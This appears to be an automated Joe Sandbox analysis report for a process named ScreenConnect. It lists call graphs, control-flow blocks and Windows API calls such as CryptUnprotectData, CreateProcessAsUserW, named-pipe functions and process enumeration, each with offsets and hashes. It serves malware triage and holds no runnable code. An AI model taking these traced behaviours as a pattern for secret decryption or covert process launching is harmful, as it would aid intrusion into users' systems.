51950->51977 51951->51936 51963 5bf6208 51952->51963 51970 5bf61f7 51952->51970 51957 5bf60ad 51956->51957 51959 5bf60bd 51956->51959 51958 5bf60b6 51957->51958 51960 5bf4d60 ProcessIdToSessionId 51957->51960 51958->51936 51961 5bf6208 2 API calls 51959->51961 51962 5bf61f7 2 API calls 51959->51962 51960->51957 51961->51957 51962->51957 51968 5bf6232 51963->51968 51969 5bf621f 51963->51969 51964 5bf6228 51964->51950 51965 5bf639a K32EnumProcesses 51966 5bf63d2 51965->51966 51966->51950 51967 5bf4d6c K32EnumProcesses 51967->51968 51968->51967 51968->51969 51969->51964 51969->51965 51975 5bf6232 51970->51975 51976 5bf621f 51970->51976 51971 5bf6228 51971->51950 51972 5bf639a K32EnumProcesses 51973 5bf63d2 51972->51973 51973->51950 51974 5bf4d6c K32EnumProcesses 51974->51975 51975->51974 51975->51976 51976->51971 51976->51972 51978 5bf6440 ProcessIdToSessionId 51977->51978 51979 5bf64b3 51978->51979 51979->51950 51981 55b5d0d 51980->51981 51985 5bf3381 51981->51985 51989 5bf3388 51981->51989 51986 5bf339b 51985->51986 51993 5bf245c 51986->51993 51990 5bf339b 51989->51990 51991 5bf245c CreateFileA 51990->51991 51992 55b5c00 51991->51992 51992->51926 51994 5bf33d8 CreateFileA 51993->51994 51996 5bf350d 51994->51996 51579 55b03d0 51580 55b0423 CreateProcessAsUserW 51579->51580 51582 55b04b4 51580->51582 51583 13b36b0 51584 13b36c6 51583->51584 51585 13b3764 51584->51585 51588 13be5e0 51584->51588 51586 13b3739 51589 13be614 51588->51589 51590 13be62e 51588->51590 51589->51590 51593 13bea99 51589->51593 51597 13beaa8 51589->51597 51590->51586 51595 13beace 51593->51595 51594 13beb06 51594->51590 51595->51594 51601 13beb50 51595->51601 51599 13beace 51597->51599 51598 13beb06 51598->51590 51599->51598 51600 13beb50 2 API calls 51599->51600 51600->51598 51602 13beb8e 51601->51602 51608 13bf788 51602->51608 51603 13bee2f 51604 13bedb7 51604->51603 51612 3fe09e1 51604->51612 51616 3fe0a08 51604->51616 51609 13bf7ac 51608->51609 51610 13bf7b3 51608->51610 51609->51610 51611 13bf930 2 API calls 51609->51611 51610->51604 51611->51610 51613 3fe0a03 51612->51613 51614 3fe0510 2 API calls 51613->51614 51615 3fe0a45 51614->51615 51615->51604 51617 3fe0a2d 51616->51617 51618 3fe0510 2 API calls 51617->51618 51619 3fe0a45 51618->51619 51619->51604

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 435 55b1868-55b18ee 444 55b18f9-55b1905 435->444 445 55b18f0-55b18f2 435->445 447 55b1910-55b1912 444->447 448 55b1907-55b190e 444->448 445->444 450 55b1920-55b1948 447->450 448->447 449 55b1914-55b191b 448->449 451 55b197a-55b19d2 449->451 452 55b191d 449->452 455 55b194a-55b194f 450->455 456 55b1951 450->456 457 55b19da-55b1a3f CreateNamedPipeW 451->457 458 55b19d4-55b19d7 451->458 452->450 459 55b1956-55b196a 455->459 456->459 462 55b1a48-55b1a69 457->462 463 55b1a41-55b1a47 457->463 458->457 466 55b196b call 55b1868 459->466 467 55b196b call 55b1857 459->467 460 55b1970-55b1977 463->462 466->460 467->460
                                                                APIs
                                                                • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 055B1A2C
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateNamedPipe
                                                                • String ID:
                                                                • API String ID: 2489174969-0
                                                                • Opcode ID: e56857846f921e3e102108b468cee7138847d24a103f1861e38f2b476bfee7ac
                                                                • Instruction ID: 5a1665b57f1e6f14a885beb448e2a0a1fa03a943bace9e7d368ef64fcc832242
                                                                • Opcode Fuzzy Hash: e56857846f921e3e102108b468cee7138847d24a103f1861e38f2b476bfee7ac
                                                                • Instruction Fuzzy Hash: D361BF71A003499FDB14CFA9D854BEEBBF6FF88300F14842AE509AB391D7759905CBA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 722 55b03d0-55b0421 723 55b042c-55b0430 722->723 724 55b0423-55b0429 722->724 725 55b0438-55b044d 723->725 726 55b0432-55b0435 723->726 724->723 727 55b045b-55b04b2 CreateProcessAsUserW 725->727 728 55b044f-55b0458 725->728 726->725 729 55b04bb-55b04e3 727->729 730 55b04b4-55b04ba 727->730 728->727 730->729
                                                                APIs
                                                                • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 055B049F
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateProcessUser
                                                                • String ID:
                                                                • API String ID: 2217836671-0
                                                                • Opcode ID: 7ccb04668fa3dbfdcfdc7a7fcfb5b2b02388f6909008d915ade0023a64fd010e
                                                                • Instruction ID: 112f17d7189a4ad91bfe5557de5c51159eed8e98c6b54ba934719bc6baf81b43
                                                                • Opcode Fuzzy Hash: 7ccb04668fa3dbfdcfdc7a7fcfb5b2b02388f6909008d915ade0023a64fd010e
                                                                • Instruction Fuzzy Hash: D7411272900209DFDB10CFA9C888ADEBBF5FF48310F15842AE918A7260D775A955CF90

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 749 5bf0b51-5bf0b5c 750 5bf0aee-5bf0b18 CryptUnprotectData 749->750 751 5bf0b5e-5bf0b93 749->751 752 5bf0b1a-5bf0b20 750->752 753 5bf0b21-5bf0b49 750->753 757 5bf0b9a-5bf0bb6 751->757 752->753 759 5bf0bb8 757->759 760 5bf0bc1 757->760 759->760
                                                                APIs
                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05BF0B05
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataUnprotect
                                                                • String ID:
                                                                • API String ID: 834300711-0
                                                                • Opcode ID: 17e83bb6594d2786e0ec6647e2a3c1bc7dddc567ced074effa77118e9c32455e
                                                                • Instruction ID: b6f11afb252c38f855cbe73b463962acbbbdd25fc635f70137af697401c2a914
                                                                • Opcode Fuzzy Hash: 17e83bb6594d2786e0ec6647e2a3c1bc7dddc567ced074effa77118e9c32455e
                                                                • Instruction Fuzzy Hash: 68219F72900219CFDF14DF98C8487EEBBF1EB88314F24845AD516B73A2C7799949CBA1
                                                                APIs
                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05BF0B05
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataUnprotect
                                                                • String ID:
                                                                • API String ID: 834300711-0
                                                                • Opcode ID: 9f9de78ed46d50ec24bf52003a45e13a74ef35f7cae49110e514f0b5e0c09478
                                                                • Instruction ID: 1310f026e52bc538a6733e53557d9fdf636579499ebd940451d457141e2f3544
                                                                • Opcode Fuzzy Hash: 9f9de78ed46d50ec24bf52003a45e13a74ef35f7cae49110e514f0b5e0c09478
                                                                • Instruction Fuzzy Hash: 212153B280024ADFDF10CF99C845BEEBBF4EF48324F108419EA18A7211C379A555CFA1
                                                                APIs
                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05BF0B05
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataUnprotect
                                                                • String ID:
                                                                • API String ID: 834300711-0
                                                                • Opcode ID: 4b12c4ab1fefe36b73746a89fb19909520a6d2aa8cd28446da343ebedba02f94
                                                                • Instruction ID: 1d1eb57101eaa1b47fceb347cdba6121bb942593c73efc4b721ff594613aac78
                                                                • Opcode Fuzzy Hash: 4b12c4ab1fefe36b73746a89fb19909520a6d2aa8cd28446da343ebedba02f94
                                                                • Instruction Fuzzy Hash: 9F2156B6800249DFCF10CF99C845BEEBBF4EF48310F148449EA14A7211C339A555CFA0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4fd1339dd044b2ed52cc993459f3196de97175fd991d2e691608cac67c6352cc
                                                                • Instruction ID: fe887ce5fd1aec594d7d0a2f0d1ff16d3f2ea4da731f6cd9d3562c80f888d078
                                                                • Opcode Fuzzy Hash: 4fd1339dd044b2ed52cc993459f3196de97175fd991d2e691608cac67c6352cc
                                                                • Instruction Fuzzy Hash: 69E21934E10229DFEB25DF68C894AADBBB6FF89300F1085D9D509A7250DB75AE85CF40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 37b2779fe266f2f19af2764daddacc02f15fd396d6f19afc7ed228e28ac08423
                                                                • Instruction ID: 128d014e25511c07d2775d758819db0c2cc19af5ae31dfe1939734828fce17cb
                                                                • Opcode Fuzzy Hash: 37b2779fe266f2f19af2764daddacc02f15fd396d6f19afc7ed228e28ac08423
                                                                • Instruction Fuzzy Hash: CB525571E0021A8FEB24DF65C854BEDB7B2FF89304F158599D50AAB290DBB09D85CF90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: abd1bf01e50e001a621a7d2d85e6b03c4e7bcba07f56ccbf40743f8e3e1289e3
                                                                • Instruction ID: d85600142f70e612cc549391ad37b737452624df2c9be269b88071b096c1c2b4
                                                                • Opcode Fuzzy Hash: abd1bf01e50e001a621a7d2d85e6b03c4e7bcba07f56ccbf40743f8e3e1289e3
                                                                • Instruction Fuzzy Hash: 27321A74A002158FEB28DB68D894BADBBF6FF89300F1485A9E509E7354DB709D85CF80

                                                                Control-flow Graph

                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BF649E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID: :m
                                                                • API String ID: 3779259828-1467208035
                                                                • Opcode ID: 93cc5049adf982e20c30078b95374cf298bf9f60270cf548548678100e862388
                                                                • Instruction ID: 8e2318bb72d6e8af0f89ecdd5b673cb12386fbaf55645cea4e110bf2f1fc7c62
                                                                • Opcode Fuzzy Hash: 93cc5049adf982e20c30078b95374cf298bf9f60270cf548548678100e862388
                                                                • Instruction Fuzzy Hash: D231CB71804358DFDB10CFAAD4517EEBBF4EF49314F15809AC954AB241C338A809CBA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 12 51b4300-51b43cd 23 51b525e-51b5265 12->23 24 51b43d3-51b43fb 12->24 26 51b443a-51b4496 call 51b5c20 24->26 27 51b43fd-51b4437 24->27 32 51b4498-51b44f9 26->32 33 51b44ff-51b4561 26->33 27->26 32->33 37 51b4563-51b45b1 33->37 38 51b45b7-51b465a 33->38 37->38 51 51b47fd-51b47ff 38->51 52 51b4660-51b4691 38->52 53 51b4801-51b4809 51->53 54 51b46bf-51b46e7 52->54 55 51b4693-51b46bd 52->55 56 51b480b 53->56 57 51b4819-51b488a 53->57 76 51b46ed-51b46f1 54->76 77 51b47e0-51b47fb 54->77 55->54 59 51b4811-51b4813 56->59 60 51b4896-51b48b6 56->60 57->60 59->57 59->60 71 51b48ba-51b48c1 60->71 72 51b48e3 71->72 73 51b48c3-51b48dd 71->73 147 51b48e9 call 51b6d98 72->147 148 51b48e9 call 51b6da8 72->148 149 51b48e9 call 51b6d32 72->149 73->72 80 51b46fb-51b4702 76->80 81 51b46f3-51b46f9 76->81 77->53 79 51b48ef-51b48f1 84 51b490f-51b4923 79->84 85 51b48f3-51b4969 79->85 80->53 81->80 86 51b4707-51b4772 81->86 84->71 152 51b496c call 51bc250 85->152 153 51b496c call 51bc260 85->153 100 51b478c-51b47ac 86->100 101 51b4774-51b478a 86->101 102 51b47b2-51b47de 100->102 101->102 102->53 103 51b496f-51b4983 145 51b4988 call 55b5410 103->145 146 51b4988 call 55b5420 103->146 109 51b498e-51b49d5 150 51b49d8 call 55b6050 109->150 151 51b49d8 call 55b6040 109->151 113 51b49db-51b4bc1 113->23 145->109 146->109 147->79 148->79 149->79 150->113 151->113 152->103 153->103
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0u
                                                                • API String ID: 0-3203441087
                                                                • Opcode ID: c45598590e605ee7d2fa64fa815e14cf3840b56e91aed1b05c574fd9a0d2d135
                                                                • Instruction ID: 20c6115ada305dab5a648d4192293469020407ba60f8b421b29ebdd870a69ed5
                                                                • Opcode Fuzzy Hash: c45598590e605ee7d2fa64fa815e14cf3840b56e91aed1b05c574fd9a0d2d135
                                                                • Instruction Fuzzy Hash: 59424B35A10619CFDB68DF68D998A9DBBB2FF88300F1085D9E509AB361DB709D85CF40

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 402 5bf6208-5bf621d 403 5bf621f-5bf6222 402->403 404 5bf6232-5bf6239 402->404 406 5bf62ec-5bf6300 403->406 407 5bf6228-5bf6231 403->407 405 5bf623e-5bf6282 call 5bf4d6c 404->405 426 5bf6287-5bf628c 405->426 408 5bf62c6-5bf62cf 406->408 409 5bf6302 406->409 411 5bf632c-5bf6340 408->411 412 5bf62d1-5bf62eb 408->412 413 5bf630e-5bf6317 409->413 416 5bf639a-5bf63d0 K32EnumProcesses 411->416 417 5bf6342-5bf638e 411->417 420 5bf63d9-5bf6401 416->420 421 5bf63d2-5bf63d8 416->421 417->416 418 5bf6390-5bf6398 417->418 418->416 421->420 427 5bf6318-5bf6325 426->427 428 5bf6292-5bf6295 426->428 427->411 429 5bf6297-5bf62c4 428->429 430 5bf6304-5bf6309 428->430 429->408 429->413 430->405
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61bcdbb15fa02f89b84f8a12ab8abe78b15b300168e538c2b2274b3a3a73b598
                                                                • Instruction ID: 48d499be009d57d906cdbeb1f05698fa6e8fee6e2d3ecf50c8190d7b21dcf781
                                                                • Opcode Fuzzy Hash: 61bcdbb15fa02f89b84f8a12ab8abe78b15b300168e538c2b2274b3a3a73b598
                                                                • Instruction Fuzzy Hash: 4A516D71A007058FCB24CFA9D884AAEBBF5FF88310F14896ED55AD7750D734A949CBA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 551 5bf245c-5bf3434 553 5bf3488-5bf350b CreateFileA 551->553 554 5bf3436-5bf345b 551->554 563 5bf350d-5bf3513 553->563 564 5bf3514-5bf3552 553->564 554->553 557 5bf345d-5bf345f 554->557 558 5bf3482-5bf3485 557->558 559 5bf3461-5bf346b 557->559 558->553 561 5bf346f-5bf347e 559->561 562 5bf346d 559->562 561->561 565 5bf3480 561->565 562->561 563->564 569 5bf3554-5bf3558 564->569 570 5bf3562 564->570 565->558 569->570 571 5bf355a 569->571 572 5bf3563 570->572 571->570 572->572
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05BF34F5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: c8cce09fea5aa3d1682ef693c583465c311169ff49bcdddb4045dae03f83b6fa
                                                                • Instruction ID: df370aa1aa0abedcd8149075d913083903a78d4e4169d51d8147a0f853c4f836
                                                                • Opcode Fuzzy Hash: c8cce09fea5aa3d1682ef693c583465c311169ff49bcdddb4045dae03f83b6fa
                                                                • Instruction Fuzzy Hash: D95158B0D00359DFDB10CFA9C844B9EBBF2FB48704F148469E908AB351D7B9A849CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 573 5bf33cc-5bf3434 575 5bf3488-5bf350b CreateFileA 573->575 576 5bf3436-5bf345b 573->576 585 5bf350d-5bf3513 575->585 586 5bf3514-5bf3552 575->586 576->575 579 5bf345d-5bf345f 576->579 580 5bf3482-5bf3485 579->580 581 5bf3461-5bf346b 579->581 580->575 583 5bf346f-5bf347e 581->583 584 5bf346d 581->584 583->583 587 5bf3480 583->587 584->583 585->586 591 5bf3554-5bf3558 586->591 592 5bf3562 586->592 587->580 591->592 593 5bf355a 591->593 594 5bf3563 592->594 593->592 594->594
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05BF34F5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 563a2dfe19a5ccfee821663cca44448b6a6ace1befe5e2caac97e79ae8ccbf2c
                                                                • Instruction ID: 1ea061163aa89bcff617d536741f7d7d3670fcf4a1830c682c167259f4a5763f
                                                                • Opcode Fuzzy Hash: 563a2dfe19a5ccfee821663cca44448b6a6ace1befe5e2caac97e79ae8ccbf2c
                                                                • Instruction Fuzzy Hash: 525166B1D003589FDB10CFA9C884B9EBBF2FB48704F148469E908AB351D779A849CF91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 710 55b03ca-55b0421 712 55b042c-55b0430 710->712 713 55b0423-55b0429 710->713 714 55b0438-55b044d 712->714 715 55b0432-55b0435 712->715 713->712 716 55b045b-55b04b2 CreateProcessAsUserW 714->716 717 55b044f-55b0458 714->717 715->714 718 55b04bb-55b04e3 716->718 719 55b04b4-55b04ba 716->719 717->716 719->718
                                                                APIs
                                                                • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 055B049F
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateProcessUser
                                                                • String ID:
                                                                • API String ID: 2217836671-0
                                                                • Opcode ID: 7d839e9529373772765f748bb4c44fb537697fa7d86eece0e66a25c80425b15d
                                                                • Instruction ID: f5ef78d8edfd86bbbe2b462a3afeee714f47aa1f3edd9bd9bf035fd638129c3b
                                                                • Opcode Fuzzy Hash: 7d839e9529373772765f748bb4c44fb537697fa7d86eece0e66a25c80425b15d
                                                                • Instruction Fuzzy Hash: 24410272900309DFDB10CFA9C888ADEBBF5FF48310F15842AE918A7260D779A955CB90

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 733 55b41cd-55b4266 ConnectNamedPipe 735 55b4268-55b426e 733->735 736 55b426f-55b42b1 733->736 735->736 740 55b42bb 736->740 741 55b42b3 736->741 742 55b42bc 740->742 741->740 742->742
                                                                APIs
                                                                • ConnectNamedPipe.KERNEL32(00000000), ref: 055B4250
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ConnectNamedPipe
                                                                • String ID:
                                                                • API String ID: 2191148154-0
                                                                • Opcode ID: 196fc2b8182f9fc42b9a1b6187889e170229dcdc73cfc8eb96f01221a793ee98
                                                                • Instruction ID: a7c67c5b984f0109b59856f61939ac288efaecb498b9ce30870262e62a909055
                                                                • Opcode Fuzzy Hash: 196fc2b8182f9fc42b9a1b6187889e170229dcdc73cfc8eb96f01221a793ee98
                                                                • Instruction Fuzzy Hash: 972102B1D00259DBDB24CF99D585BDDBBF1BF48610F14806AE919AB350CB789845CFA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 743 5bf6410-5bf643b 744 5bf6440-5bf64b1 ProcessIdToSessionId 743->744 745 5bf64ba-5bf64e2 744->745 746 5bf64b3-5bf64b9 744->746 746->745
                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BF649E
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID:
                                                                • API String ID: 3779259828-0
                                                                • Opcode ID: 5d80e9524d0e51ac1185780fb09443370f09490197b7310872e985527e50c9ca
                                                                • Instruction ID: ba49d39b5a1dc970d72cb2fd67a748fd50adfd782fc0b1150807e18dc514b3c3
                                                                • Opcode Fuzzy Hash: 5d80e9524d0e51ac1185780fb09443370f09490197b7310872e985527e50c9ca
                                                                • Instruction Fuzzy Hash: 5C2145B2C042498FCB10CF9AC8447DEBBF4EB48324F15805AD858A7251D378A549CFA1
                                                                APIs
                                                                • ConnectNamedPipe.KERNEL32(00000000), ref: 055B4250
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ConnectNamedPipe
                                                                • String ID:
                                                                • API String ID: 2191148154-0
                                                                • Opcode ID: 2e19075c8ffcf2bfac8d2b9b95e93ba22379974c94d2a34f146ee67ac389042a
                                                                • Instruction ID: 8204fb8b0a2d783c7eb867b3b48f6ee75d268b2878768662274e561914e77659
                                                                • Opcode Fuzzy Hash: 2e19075c8ffcf2bfac8d2b9b95e93ba22379974c94d2a34f146ee67ac389042a
                                                                • Instruction Fuzzy Hash: 1121E0B0D04259DFDB24CFAAC488B9EBBF5BF48600F148069E919A7351CB749805CFA0
                                                                APIs
                                                                • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05BF63BD
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: EnumProcesses
                                                                • String ID:
                                                                • API String ID: 84517404-0
                                                                • Opcode ID: 5912be2cfcaedc35cf304f7d637d7a4df5131901c36e4c20f63188da5a4d8246
                                                                • Instruction ID: 9a2af89045d54dbc0e4c8a0f5e83ac58a83beedecd5f8a82d62d1d437b1422d9
                                                                • Opcode Fuzzy Hash: 5912be2cfcaedc35cf304f7d637d7a4df5131901c36e4c20f63188da5a4d8246
                                                                • Instruction Fuzzy Hash: 2B2116B19042099FDB10CF9AD885A9EFBF4FB48310F10846ED919A7340C378A905CBA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: d
                                                                • API String ID: 0-2564639436
                                                                • Opcode ID: db6db2c864572e594cc9980998dc1ec4da15d5fa4697940a687846415e830b59
                                                                • Instruction ID: 215998c25d7d7759c6b180f6f92d8df04f277c590f518a9b771bd17d1763526f
                                                                • Opcode Fuzzy Hash: db6db2c864572e594cc9980998dc1ec4da15d5fa4697940a687846415e830b59
                                                                • Instruction Fuzzy Hash: DFD18375A40716CFCB04DF68D894A9AB7B1FF89310B148699E909AB365DB30FC95CF80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: d
                                                                • API String ID: 0-2564639436
                                                                • Opcode ID: 3cfe3b79bfa9b2e24ec5b59269cf12d94a9fca95b48c20527f1ebbdcfe3f8740
                                                                • Instruction ID: 52c8387a810d1f521b53d9afbe9b0aa6430a0673c832b508c63ab940f5a7bb09
                                                                • Opcode Fuzzy Hash: 3cfe3b79bfa9b2e24ec5b59269cf12d94a9fca95b48c20527f1ebbdcfe3f8740
                                                                • Instruction Fuzzy Hash: 07C14735600602DFD714DF18C494DAABBF2FF88310B2ACA69E55A9B665D770FC46CB80
                                                                APIs
                                                                • WaitNamedPipeW.KERNEL32(00000000), ref: 055B5DCF
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: NamedPipeWait
                                                                • String ID:
                                                                • API String ID: 3146367894-0
                                                                • Opcode ID: d095941d4031c0f43a871ec3b255364fdac0d2b39ed5eeb43088e099090accba
                                                                • Instruction ID: 6b1170cf60ea5b4c26392b84b15ac52233c888b99f0a7c7e58df3bb8b985eed0
                                                                • Opcode Fuzzy Hash: d095941d4031c0f43a871ec3b255364fdac0d2b39ed5eeb43088e099090accba
                                                                • Instruction Fuzzy Hash: 8E2133B6C00209CFDB14CF9AC548BEEBBB4BF48320F11842ED919A7240D379A545CFA1
                                                                APIs
                                                                • WaitNamedPipeW.KERNEL32(00000000), ref: 055B5DCF
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: NamedPipeWait
                                                                • String ID:
                                                                • API String ID: 3146367894-0
                                                                • Opcode ID: 0bb6a9ccfbdb8b3347c4956110dede1589eb6408497ad7e9fcfc4cb60ae28686
                                                                • Instruction ID: 85ac50c27f30f3594e19e007d4a9ed8cac7ee1d6a491dfd74cfc9c813ce145ba
                                                                • Opcode Fuzzy Hash: 0bb6a9ccfbdb8b3347c4956110dede1589eb6408497ad7e9fcfc4cb60ae28686
                                                                • Instruction Fuzzy Hash: 1F21F4B68003498FDB14CF9AC448AEEBBF4FB48310F15842DD559A7240D779A545CFA1
                                                                APIs
